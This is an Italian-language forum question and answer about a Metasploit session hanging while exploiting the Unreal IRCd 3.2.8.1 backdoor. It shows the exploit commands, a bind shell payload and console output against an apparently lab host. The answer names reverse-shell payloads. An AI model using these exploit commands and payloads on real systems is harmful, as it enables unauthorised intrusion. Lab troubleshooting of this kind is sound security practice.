Metasploit bloccato su "Invio di un comando backdoor ..."

-3

Sto cercando di usare Metasploit nella backdoor di Unreal IRCD 3281. Ho provato con diversi tipi di payload ma il programma si blocca sull'ultima riga:

msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl 
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started bind handler
[*] Connected to 10.0.1.50:6667...
[*] Command shell session 1 opened (10.0.10.3:43301 -> 10.0.1.50:4444) at 2015-11-27 00:11:32 +0100
[*] Sending backdoor command...

E dopo questo non ho mai ricevuto il prompt indietro. Perché succede? Mi sembra di avere una sessione e dovrebbe funzionare, ma poi non succede nulla.

Modifica

Se aspetto un paio di minuti, ottengo questo:

[*] 10.0.1.50 - Command shell session 2 closed.  Reason: Died from Errno::ECONNRESET
msf exploit(unreal_ircd_3281_backdoor) >

Ma non ho mai avuto l'opportunità di scrivere qualcosa nella console prima che ciò accada, cosa c'è che non va?

    
posta theva 27.11.2015 - 00:19
fonte

1 risposta

-1

Non sono molto sicuro dato che non fornisci molte informazioni qui, ma da quanto segue:

[*] 10.0.1.50 - Command shell session 2 closed. Reason: Died from Errno::ECONNRESET msf exploit(unreal_ircd_3281_backdoor) >

Posso capire che è il tuo multihandler il problema. Devi controllare il tuo carico utile e assicurarti di aver impostato quello corretto (è diverso per ogni sistema operativo).

Ad esempio per i sistemi Windows:

windows/meterpreter/reverse_tcp

Per i sistemi Unix / Linux:

generic/shell_reverse_tcp

Dopo aver controllato il payload, esegui di nuovo, guarda cosa stai ottenendo.

    
risposta data 27.11.2015 - 19:00
fonte

Leggi altre domande sui tag